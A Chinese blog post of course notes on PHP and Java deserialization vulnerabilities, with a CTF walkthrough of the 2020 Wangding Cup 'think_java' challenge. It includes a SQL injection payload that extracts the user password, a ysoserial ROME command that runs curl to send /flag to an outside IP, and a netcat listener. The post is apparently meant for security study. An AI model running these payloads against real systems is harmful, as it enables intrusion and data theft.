WEB漏洞-反序列化之PHP&JAVA

最新推荐文章于 2024-05-23 09:45:45 发布
最新推荐文章于 2024-05-23 09:45:45 发布
阅读量752 收藏 5
点赞数 1
分类专栏: PHP 渗透测试 网络安全 文章标签: java php 序列化 反序列化
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_19446965/article/details/119153995
版权
网络安全 同时被 3 个专栏收录
33 篇文章 8 订阅
订阅专栏
渗透测试
18 篇文章 4 订阅
订阅专栏
PHP
3 篇文章 0 订阅
订阅专栏

 免责声明: 本内容仅为【小迪安全-web渗透测试】的学习笔记,仅用于技术研究,禁止使用文章中的技术进行非法行为,如利用文章中技术进行非法行为造成的后果与本文作者无关。

序列化和反序列化

序列化 (Serialization):将对象的状态信息转换为可以存储或传输的形式的过程。在序列化期间,对象将其当前状态写入到临时或持久性存储区。
反序列化:从存储区中读取该数据,并将其还原为对象的过程,称为反序列化。

一、PHP反序列化

在这里插入图片描述

原理:未对用户输入的序列化字符串进行检测,导致攻击者可以控制反序列化过程,从而导致代码执行,SQL注入,目录遍历等不可控后果。在反序列化的过程中自动触发了某些魔术方法。当进行反序列化的时候就有可能会触发对象中的一些魔术方法。

serialize() //将一个对象转换成一个字符串
unserialize() //将字符串还原成一个对象

触发:unserialize函数的变量可控,文件中存在可利用的类,类中有魔术方法:
参考:https://www.cnblogs.com/20175211lyz/p/11403397.html

  • __construct()//创建对象时触发
  • __destruct() //对象被销毁时触发
  • __call() //在对象上下文中调用不可访问的方法时触发
  • __callStatic() //在静态上下文中调用不可访问的方法时触发
  • __get() //用于从不可访问的属性读取数据
  • __set() //用于将数据写入不可访问的属性
  • __isset() //在不可访问的属性上调用isset()或empty()触发
  • __unset() //在不可访问的属性上使用unset()时触发
  • __invoke() //当脚本尝试将对象调用为函数时触发

在这里插入图片描述

例一:

<?php
error_reporting(0);
include "flag.php";
$KEY = "liuyifei";
$str = $_GET['str'];
if (unserialize($str) === "$KEY")
{
    echo "$flag";
}
show_source(__FILE__);

class ABC{
    public $test;
    function __construct(){
        $test =1;
        echo '调用了构造函数<br>';
    }
    function __destruct(){
        echo '调用了析构函数<br>';
    }
    function __wakeup(){
        echo '调用了苏醒函数<br>';
    }
}
echo '创建对象a<br>';
$a = new ABC;
echo '序列化<br>';
$a_ser=serialize($a);
echo '反序列化<br>';
$a_unser = unserialize($a_ser);
echo '对象快要死了!';
?>

例二:

首先ctf命名及代码函数unserialize判断反序列化知识点
第一:获取flag存储flag.php
第二:两个魔术方法__destruct __construct
第三:传输str参数数据后触发destruct,存在is_valid过滤
第四:__destruct中会调用process,其中op=1写入及op=2读取
第五:涉及对象FileHandler,变量op及filename,content,进行构造输出

<?php
class FileHandler{
	public $op=' 2';//源码告诉我们op为1时候是执行写入为2时执行读
	public $filename="flag.php";//文件开头调用的是flag.php
    public $content="xd";
}
$flag = new FileHandler();
$flag_1 = serialize($flag);
echo $flag_1;
?>

涉及:反序列化魔术方法调用,弱类型绕过,ascii绕过
使用该类对flag进行读取,这里面能利用的只有__destruct函数(析构函数)。
__destruct函数对$this->op进行了===判断并内容在2字符串时会赋值为1,
process函数中使用==对$this->op进行判断(为2的情况下才能读取内容),
因此这里存在弱类型比较,可以使用数字2或字符串' 2'绕过判断。

is_valid函数还对序列化字符串进行了校验,因为成员被protected修饰,
因此序列化字符串中会出现ascii为0的字符。经过测试,在PHP7.2+的环境中,
使用public修饰成员并序列化,反序列化后成员也会被public覆盖修饰。

二、JAVA反序列化

在这里插入图片描述


在这里插入图片描述

例: 2020-网鼎杯-朱雀组-Web-think_java真题复现

下方的特征可以作为序列化的标志参考:

  • rO0AB开头,你基本可以确定这串就是Java序列化base64加密的数据。
  • aced开头,那么他就是这一段Java序列化的16进制。

0x01 注入判断,获取管理员帐号密码:
根据提示附件进行javaweb代码审计,发现可能存在注入漏洞
另外有swagger开发接口,测试注入漏洞及访问接口进行调用测试
数据库名:myapp,列名name,pwd
注入测试:

POST /common/test/sqlDict
dbName=myapp?a=' union select (select pwd from user)#

0x02 接口测试
/swagger-ui.html接口测试:

{
"password":"ctfhub_29588_13038",
  "username": "ctfhub"
}

登录成功返回数据:

{  
"data": "Bearer rO0ABXNyABhjbi5hYmMuY29yZS5tb2RlbC5Vc2VyVm92RkMxewT0OgIAAkwAAmlkdAAQTGphdmEvbGFuZy9Mb25nO0wABG5hbWV0ABJMamF2YS9sYW5nL1N0cmluZzt4cHNyAA5qYXZhLmxhbmcuTG9uZzuL5JDMjyPfAgABSgAFdmFsdWV4cgAQamF2YS5sYW5nLk51bWJlcoaslR0LlOCLAgAAeHAAAAAAAAAAAXQABmN0Zmh1Yg==",  
"msg": "登录成功",  
"status": 2,  
"timestamps": 1594549037415
}

0x03 回显数据分析攻击思路
JAVAWEB特征可以作为序列化的标志参考:
一段数据以rO0AB开头,你基本可以确定这串就是JAVA序列化base64加密的数据。
或者如果以aced开头,那么就是这一段java序列化的16进制。

分析数据:
先利用py2脚本base64解密数据

import base64
a = "rO0ABXNyABhjbi5hYmMuY29yZS5tb2RlbC5Vc2VyVm92RkMxewT0OgIAAkwAAmlkdAAQTGphdmEvbGFuZy9Mb25nO0wABG5hbWV0ABJMamF2YS9sYW5nL1N0cmluZzt4cHNyAA5qYXZhLmxhbmcuTG9uZzuL5JDMjyPfAgABSgAFdmFsdWV4cgAQamF2YS5sYW5nLk51bWJlcoaslR0LlOCLAgAAeHAAAAAAAAAAAXQABWFkbWlu"
b = base64.b64decode(a).encode('hex')
print(b)

再利用SerializationDumper解析数据
java -jar SerializationDumper.jar base64后的数据

0x04 生成反序列化payload
解密后数据中包含帐号等信息,通过接口/common/user/current分析可知数据有接受,说明存在反序列化操作,思路:将恶意代码进行序列化后进行后续操作
利用ysoserial进行序列化生成

java -jar ysoserial-master-30099844c6-1.jar ROME "curl http://47.75.212.155:4444 -d @/flag" > xiaodi.bin

利用py2脚本进行反序列化数据的提取

import base64
file = open("xiaodi.bin","rb")
now = file.read()
ba = base64.b64encode(now)
print(ba)
file.close()

0x05 触发反序列化,获取flag
服务器执行:nc -lvvp 4444
数据包直接请求获取进行反序列数据加载操作

涉及资源:
http://www.dooccn.com/php/
https://www.ctfhub.com/\#/challenge
https://ctf.bugku.com/challenges\#flag.php
https://cgctf.nuptsast.com/challenges\#Web
https://www.cnblogs.com/20175211lyz/p/11403397.html
https://github.com/frohoff/ysoserial/releases
https://github.com/WebGoat/WebGoat/releases
https://github.com/NickstaDB/SerializationDumper/releases/tag/1.12

来自:

https://www.daimajiaoliu.com/daima/7b73c88186d1800
http://www.qishunwang.net/news_show_5864.aspx

Rnan-prince
关注
  • 1
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
第38天:WEB漏洞-反序列化PHP&JAVA全解(下)1
08-03
演示案例:Java 反序列化及命令执行代码测试WebGoat_Javaweb 靶场反序列化测试0x01 注入判断,获取管理员帐号密码:根据提示附件进行 java
魔术方法总结
梦里不知身是客
12-26 9856
__construct(),类的构造函数 __destruct(),类的析构函数 __call(),在对象中调用一个不可访问方法时调用 __callStatic(),用静态方式中调用一个不可访问方法时调用 __get(),获得一个类的成员变量时调用 __set(),设置一个类的成员变量时调用 __isset(),当对不可访问属性调用isset()或empty()时调用 __unset(
CTF网鼎杯2020朱雀组 thinkjava思路记录
最新发布
c0529的博客
05-23 986
1.代码分析 BUUCTF在线评测 (buuoj.cn)打开ctf赛题之后,下载class文件,这个部分是不完整点的源码 在sqldict中存在一个sql注入点,没有采用java的预编译,调用了这个的是在test中,同时,这个采用了swagger接口,这是一个测试页面的接口,我们直接尝试打开这个页面 打开 网址/swagger-ui.html 2.测试点1 这里可以看见有三个可以测试的位置,参考源码中的文件地址,可以发现sql注入点存在在test这个测试中,我们dbName注入sql注
web漏洞-反序列化PHP&JAVA全解(上)(37)
san3144393495的博客
06-18 1582
在这给过程中,会涉及到一种叫做有类和无类的情况,开发里面经常看到的一个东西,我们称之为类,类对象,存在类的话,在类里面有一些内置的魔术方法,如果有类用到反序列化这个操作,就会触发到里面的魔术方法,有时候在不经意之间就会和其他漏洞相互组合。原理:未对用户输入的序列化字符串进行检测,导致攻击者可以控制反序列化过程,从而导致代码执行,sql注入,目录遍历等不可控的后果。相关的开发语言进行序列化就会转换成二进制,xml,json数据,这种数据反序列就会转换成开发语言,代码形式。数据格式类型的相互转换。
Java之模拟PHP序列化serialize()/反序列化unserialize()方法
netuser1937的博客
11-08 1686
PHP的serialize()/unserialize(),方便把一个数组序列化反序列化Java的serialize,序列化之后,会把java.util…包名都放进去了,而且格式也不同于php, 对于汉字 php 占用2个字符,java占用一个字符,隐藏php序列化后,再由java 反序列化,可能导致乱码。 PHPSerializer 工具类: 当前版本实现了对各种基本类型、数组、ArrayList、HashMap、和其它可序列化对象的序列化。实现了 PHP 5 中的 Serializable 接口的
php反序列化部分学习
qq_63267612的博客
07-24 332
_isset()//在不可访问的属性上调用isset()或empty()触发。//a为要反序列化的对象(序列化结果开头是a,不影响作为数组元素的$a的析构)__wakeup()//执行unserialize()时,先会调用这个函数。__callStatic()//在静态上下文中调用不可访问的方法时触发。__unset()//在不可访问的属性上使用unset()时触发。__call()//在对象上下文中调用不可访问的方法时触发。__set()//用于将数据写入不可访问的属性。...
第37天:WEB漏洞-反序列化PHP&JAVA全解(上)1
08-03
WEB漏洞-反序列化PHP&JAVA全解(上) 在 WEB 应用程序中,反序列化是一种常见的漏洞,攻击者可以通过反序列化来控制代码执行、SQL 注入、目录遍历等不可控后果。在 PHPJAVA 中,反序列化漏洞尤其常见,本文将...
java反序列化利用工具
07-06
Java反序列化是一种将已序列化的对象状态转换回对象的过程,通常用于持久化数据或在网络间传输对象。在Java中,这一过程涉及到`java.io.ObjectInputStream`类,它能够读取由`java.io.ObjectOutputStream`写入的字节...
利用PHAR协议进行PHP反序列化攻击1
08-03
PHP反序列化攻击是一种常见的安全漏洞利用方式,其中PHAR(Php ARchive)协议是这类攻击的一个关键路径。PHAR是PHP中用于打包和分发代码的机制,类似于Java的JAR文件。在PHP 5.3及以上版本中,默认支持PHAR,但为了...
第30天:WEB漏洞-RCE代码及命令执行漏洞全解1
08-03
**WEB漏洞-RCE代码及命令执行漏洞全解** 在Web应用程序的开发过程中,为了实现功能的多样性与便捷性,程序员常常会使用代码调用或命令执行功能。然而,这种做法也可能带来严重的安全风险,即代码执行(RCE,Remote ...
PHP反序列化
aetlypdlg_ys的博客
05-28 452
序列化是将数据转化成一种可逆的数据结构,自然,逆向的过程就叫做反序列化。简而言之,序列化相当于加密,反序列化相当于解密。再看一个生动的例子:我们在网上买桌子,桌子这种很不规则的东西,这时候一般都会把它拆掉成板子,再运出去,这个过程就可看作序列化的过程(把数据转化为可以存储或者传输的形式)。当我们收到货后,需要自己把这些板子组装成桌子的样子,这个过程就像反序列的过程(转化成当初的数据对象)。php 将数据序列化反序列化会用到两个函数serialize 将对象格式化成有序的字符串。
反序列化漏洞(3), CTF夺旗
探测???
11-17 150
Call 类中调用了 test1() 方法, 这不是一个魔术方法, 那么我们查看一下哪个类中直接调用了 test1() 这个方法, 看到在 start_gg 类中直接调用了 test1() 方法, 那么定位到 start_gg 类.func 中调用了 __invoke() 方法, 那么查找哪个类里面有用函数形式调用对象的代码, 看到 funct 类中使用 s1() 的形式调用, 那么让 mod1 作为一个对象即可, 定位到 funct 类.夺旗我们可以从调用链的终点开始分析.
PHP反序列化【原理+CTF实战】
2301_80127209的博客
04-19 988
申明:本账号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法。序列化的目的是方便数据的传输和存储,在PHP中,序列化反序列化一般用做缓存,比如session缓存,cookie等.进行绕过,(在赛后我把题给Ssh1y写了,他的利用方式是nc反弹个shell,属实是开拓了我的眼界)。环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等。”,这显然就无法继续利用了。编码后在前部加7个1。
反序列化漏洞详解(三)
m0_72125469的博客
12-03 242
wakeup绕过(不怎么重要,但需要知道)反序列化漏洞:CVE-2016-7124 就是这个原因漏洞产生原因:如果存在__wakeup方法,调用unserilize()方法前泽贤调用wakeup方法,但是序列化字符串中表示对象属性个数的值大于真实的属性个数时,会跳过__wakeup()的执行直接实战这里其实我有两个问题第一个问题 __wakeup不是在反序列化之前执行的嘛 他赋值不应该是没用嘛 他执行结束后对象获取的不是序列化字符串的值嘛?难道__wakeup会一直检查?解决:总结起来,
CTFer成长之路之反序列化漏洞
自强不息
02-25 692
文笔生疏,措辞浅薄,望各位大佬不吝赐教,万分感谢。
PHPJava、Python反序列化的区别
weixin_42974824的博客
08-11 1063
PHPJava、Python反序列化的区别
使用 Fuzztag 一键爆破反序列化
阿道夫的博客
03-06 279
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。同时每个成长路线对应的板块都有配套的视频提供:当然除了有配套的视频,同时也为大家整理了各种文档和书籍资料&工具,并且已经帮大家分好类了。
2022淮安市第十七届职业学校技能大赛网络安全题解WP
明裕学长的博客
11-04 2596
这题没要求版本号,只要求端口号,可以用-sS,要全面再加上-p-nmap-p--sSFlag[22;111;6000]2、将服务器中tmp文件夹下的字典下载至本地,并将字典中最后一位用户名作为flag提交;3、应用工具获取服务器中黑客账户的密码。并将黑客的密码作为flag提交;4、在服务器中查看sudo软件的版本,将sudo的版本号作为flag提交;5、在服务器中登录恶意用户,查看恶意用户在服务器中输入的第一条指令,将指令作为flag提交;先对恶意用户进行爆破。
CTF-PHP反序列化
m0_65336233的博客
10-18 1336
CTF-PHP反序列化
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值